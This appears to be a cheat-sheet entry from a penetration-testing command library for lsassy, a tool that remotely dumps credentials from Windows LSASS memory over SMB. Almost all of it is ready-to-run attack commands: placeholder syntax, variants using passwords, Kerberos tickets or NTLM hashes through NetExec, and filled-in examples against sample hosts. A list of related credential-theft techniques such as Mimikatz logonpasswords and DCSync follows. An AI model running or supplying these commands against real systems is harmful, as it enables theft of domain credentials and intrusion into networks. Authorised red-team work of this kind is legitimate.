Lsassy LSASS Dump
Remotely dump LSASS credentials using lsassy
- Tool
- lsassy
- Category
- Credential Attacks / Hash Dumping
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
lsassy -u '<user>' -p '<password>' -d '<domain>' -dc-ip <dc_ip> <ip>
Credential variants
The same attack using a different authentication material.
Kerberos Ticket requires Kerberos ticket
lsassy -k --no-pass -d '<domain>' <ip>
NetExec Module requires password
nxc smb '<ip>' -u '<user>' -p '<password>' -M lsassy
NetExec Module (Hash) requires NTLM hash
nxc smb '<ip>' -u '<user>' -H '<hash>' -M lsassy
Examples
lsassy -u 'user' -p 'password' -d 'corp.local' -dc-ip 192.168.1.2 192.168.1.31
lsassy -k --no-pass -d 'corp.local' us-mssql.corp.local
nxc smb '192.168.1.31' -u 'user' -p 'password' -M lsassy
Tags
Related commands
- Impacket DPAPI Masterkey Decrypt DPAPI masterkey using user password to derive DPAPI encryption key
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Impacket Targeted DCSync (Single User) DCSync only one specific account instead of replicating the whole NTDS. Massively…
- Mimikatz Credential Dump Extract plaintext passwords and hashes from all available sources
- Mimikatz dpapi::masterkey Decrypt a DPAPI master key using the owner's plaintext password (or NT hash). Required…
- Mimikatz lsadump::dcsync Pull a single user's NT hash and Kerberos keys directly from a DC via the MS-DRSR…
- Mimikatz lsadump::sam Extract local SAM hashes (built-in Administrator, local users) from a live Windows host.…
- Mimikatz sekurlsa::logonpasswords Dump credentials (NT hashes, Kerberos keys, plaintext where wdigest is enabled, MSV1_0)…